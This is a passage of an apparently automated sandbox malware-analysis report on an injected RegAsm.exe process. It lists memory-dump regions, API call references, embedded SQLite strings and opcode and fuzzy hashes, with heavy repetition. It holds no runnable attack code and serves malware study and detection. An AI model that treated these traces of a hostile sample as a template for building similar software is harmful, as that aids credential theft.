                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 3b99fe659864dfb008f49b3ea429ceb041c8b9b05fd91e94e7670ba7bfcdef27
                                                                                                                                                                                                                                                              • Instruction ID: edb8e798e145eb068b623870ad84ba7b38c38ad3abfdc0e5048543d0f86d1ed9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b99fe659864dfb008f49b3ea429ceb041c8b9b05fd91e94e7670ba7bfcdef27
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C21F4B76402215BC700DE1CDC405EB7BD0FB94A11F99442AFD84D7241E229D58987E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologmemcpy
                                                                                                                                                                                                                                                              • String ID: K@$K@$K@
                                                                                                                                                                                                                                                              • API String ID: 2991061955-1546295686
                                                                                                                                                                                                                                                              • Opcode ID: e3133dc068ce2456e00f429e53e50bbf90f9da3ed43d8ea12ccbb3485ad347e0
                                                                                                                                                                                                                                                              • Instruction ID: 09f83a8a565cca207f9f4f14651987df85ea441a9bb6a010da389feee8c69957
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3133dc068ce2456e00f429e53e50bbf90f9da3ed43d8ea12ccbb3485ad347e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA218331F04205ABE724DF99D84176EBBB5EF94750F20452FE405AB3C1C7B4AA44CB99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: bedcbf4f6f6991a66ebedb2c6703b27e6cb14fbc385fb265b0d08879a9d881e5
                                                                                                                                                                                                                                                              • Instruction ID: 264e9172112e90073a03eb7f227455f27bc4cb6295acd95cd1d6a611bd1212b1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bedcbf4f6f6991a66ebedb2c6703b27e6cb14fbc385fb265b0d08879a9d881e5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C214935144BA05BC321DF389C80AB3BBF2AF55700B9D995CE1D287796E222E485C790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 198433D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                                                                                                                                                                                                                              • API String ID: 0-1935849370
                                                                                                                                                                                                                                                              • Opcode ID: da79f256ab59c4ed502f1d5b9c67179b0805e2dc97838916c09f8a33222680a7
                                                                                                                                                                                                                                                              • Instruction ID: db20e61dfd163589d7c56cc6450a16ffb16a13ce25bf877943bf30be6970818d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da79f256ab59c4ed502f1d5b9c67179b0805e2dc97838916c09f8a33222680a7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D01C0797002164BD601DF1DE800B8AB3E9AFD5311F59C16BF6008B280EBB0E58B8BA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042444E), ref: 0040E6CC
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6D3
                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6DF
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040E70A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                              • String ID: NDB
                                                                                                                                                                                                                                                              • API String ID: 1243822799-2307052389
                                                                                                                                                                                                                                                              • Opcode ID: f4e31b41c4f837f3f9b6a05b65a51a9ce5930b8ebfcd67e28f82b396df0ccc0f
                                                                                                                                                                                                                                                              • Instruction ID: 25b842971a62ea4220106e84a2e499dab2200740227a77a54e95fb6ecba8386c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e31b41c4f837f3f9b6a05b65a51a9ce5930b8ebfcd67e28f82b396df0ccc0f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF0FEA6900124BBCB50ABE9AC09ABF76FDEF0CB12F001042FA41E1090E7388A51D7B4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 85e8a741da4f6023129020bb1b4af472e37390f425639d4db5fa695f4f9be2d8
                                                                                                                                                                                                                                                              • Instruction ID: 4a255dcd3bbc3c7e3808dc96e1cf451025275d8634512ca5db2ba96ac9f376b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85e8a741da4f6023129020bb1b4af472e37390f425639d4db5fa695f4f9be2d8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3029CF0908756CFD702DF28DA84B1AB7E8BF44304F18492DE98987281E775E959CBD2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eb3910e2342b6addf9fb5c0f43c4b40be6ad57c9277d1b0cf87785cd2fbc6964
                                                                                                                                                                                                                                                              • Instruction ID: 45f40fe649d34042635d24fb5a7a019498404e87ba980409057cff694d640089
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3910e2342b6addf9fb5c0f43c4b40be6ad57c9277d1b0cf87785cd2fbc6964
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0A17FB09016A1DFD7119F3DD888A1A377CBF10746B0A0429EC09D7291D735EA6ECBE6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00418C3D
                                                                                                                                                                                                                                                                • Part of subcall function 00418E14: __getptd_noexit.LIBCMT ref: 00418E17
                                                                                                                                                                                                                                                                • Part of subcall function 00418E14: __amsg_exit.LIBCMT ref: 00418E24
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00418C54
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00418C62
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00418C72
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00418C86
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              • Opcode ID: 196a9b5a0ffbf0a07e74f70d4afe28d89454b2ba936b2bad243be07296f6c190
                                                                                                                                                                                                                                                              • Instruction ID: 1c9dc4c2fd994eab8bb54244213b597f31c2b611719aefda59fbeadc66384906
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 196a9b5a0ffbf0a07e74f70d4afe28d89454b2ba936b2bad243be07296f6c190
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15F06231A457109BD620BB655802BC937A0AF00728F11015FF540972C2DF6C59C1CAEE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00407819
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407D68
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407D7C
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: #
                                                                                                                                                                                                                                                              • API String ID: 3207582090-1885708031
                                                                                                                                                                                                                                                              • Opcode ID: b805d3b9565853708e99e7ae7d1bb92876f5adb27d2dc30a444658b3658ed647
                                                                                                                                                                                                                                                              • Instruction ID: c0a52271d844bb62f607544ada46581858a80ab82f245f3e65b8284815ee8f7a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b805d3b9565853708e99e7ae7d1bb92876f5adb27d2dc30a444658b3658ed647
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6125F3180414CEADB05EBE6C956BEDBF78AF14308F1444AEE502732C2DB782759DB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • fts5: syntax error near "%.*s", xrefs: 1994751C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: fts5: syntax error near "%.*s"
                                                                                                                                                                                                                                                              • API String ID: 0-498961494
                                                                                                                                                                                                                                                              • Opcode ID: ff8a01b7d2c245fa5bbcc94c39087561c3405d1f47f22cb6e861b3f495000515
                                                                                                                                                                                                                                                              • Instruction ID: fe79831f17757c7614628e75f780e8286c44a66599290ddb936b423b71c4d33c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff8a01b7d2c245fa5bbcc94c39087561c3405d1f47f22cb6e861b3f495000515
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39B1A2B04043559FD712CF28C980B5EBBECAF44348F68491DF8C99B280D775E589CBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
